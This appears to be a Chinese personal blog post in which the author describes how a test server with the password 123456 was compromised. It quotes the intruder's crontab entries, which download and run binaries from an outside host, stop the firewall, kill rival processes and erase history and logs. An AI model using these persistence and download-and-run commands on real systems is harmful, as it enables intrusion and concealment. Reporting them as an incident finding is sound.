从服务器登录互联网开始,就要注意安全
[文章作者:磨延城 转载请注明原文出处: https://mo2g.com/view/81/ ]
前一段时间,为了测试大数据环境下mysql的性能,我向公司申请了一台PC电脑安装测试环境,搭建详情请看《centos 6.4 搭建nginx+php+MariaDb+memcached开发环境》.因为是用来测试,所以为了方便,密码设置了最简单的123456,又为了方便自己远程登录测试,设置路由器做了端口映射,就这样,测试开始了.
前一段时间,为了测试大数据环境下mysql的性能,我向公司申请了一台PC电脑安装测试环境,搭建详情请看《centos 6.4 搭建nginx+php+MariaDb+memcached开发环境》。因为是用来测试,所以为了方便,密码设置了最简单的123456,又为了方便自己远程登录测试,设置路由器做了端口映射,就这样,测试开始了。
为了测试在不同数据量的MariaDb数据库sql语句的性能,我分别创建包含10W、50W、100W、500W条数据的表。然而就在创建50W的数据表的过程中,服务器卡死了,用来监视服务器资源占用的htop显示,cpu使用率超载了。硬盘超载还能理解,CPU怎么会突然超载?
于是在htop列出的进程中进行排查,突然就有了重大发现。几个陌生的进程出现在显示屏上,分别是sksapd、skysapd、ksapd、kysapd。第一时间意识到测试环境被入侵使坏了,当时有点小兴奋,但又有点纠结。兴奋是因为有人来跟我互动了,顺便可以借着测试环境来了解入侵者的行为习惯;纠结的是以后不能再设置简单的密码了。
经过分析,历史操作信息,确认到crontab进程被做了手脚,入侵者往里边添加了很多信息,大部分是用于掩人耳目的垃圾注释,提取出来的主要信息如下:
*/101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/sksapd */101 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/skysapd */1 * * * * killall -9 new6 */1 * * * * killall -9 new4 */1 * * * * cd /etc; rm -rf dir sksapd.* */1 * * * * cd /etc; rm -rf dir skysapd.* */99 * * * * cd /root > .bash_history */1 * * * * chmod 7777 /etc/sksapd */1 * * * * chmod 7777 /etc/skysapd */99 * * * * killall -9 cupsdd */1 * * * * killall -9 node24 */98 * * * * killall -9 ksapd */96 * * * * killall -9 kysapd */96 * * * * killall -9 atdd */1 * * * * chmod 7777 /etc/cupsdd */1 * * * * chmod 7777 /etc/ksapd */1 * * * * chmod 7777 /etc/kysapd */96 * * * * killall -9 sksapd */96 * * * * killall -9 skysapd */1 * * * * chmod 7777 /etc/atdd */1 * * * * /etc/init.d/iptables stop */1 * * * * nohup /etc/cupsdd > /dev/null 2>&1& */99 * * * * cd /etc;./ksapd */97 * * * * cd /etc;./kysapd */97 * * * * cd /etc;./atdd */69 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/cupsdd */97 * * * * cd /etc;./sksapd */97 * * * * cd /etc;./skysapd */79 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/ksapd */89 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/kysapd */99 * * * * cd /etc; wget http://www.dgnfd564sdf.com:8080/atdd */1 * * * * cd /etc; rm -rf dir cupsdd.* */1 * * * * cd /etc; rm -rf dir kysapd.* */1 * * * * cd /etc; rm -rf dir ksapd.* */1 * * * * cd /etc; rm -rf dir atdd.* */1 * * * * killall -9 freeBSD */1 * * * * history -c */15 * * * * cd /var/log > secure
突然想起来,我是打算做测试的,没时间研究入侵习惯。为了赶紧测试,重装了一遍系统,设置了新密码。
这回的经历告诉我,互联网上的入侵者,真的是时刻潜伏着。那么,线下的入侵者,也不会闲着。所以,凡事都要注意安全。
我来说两句: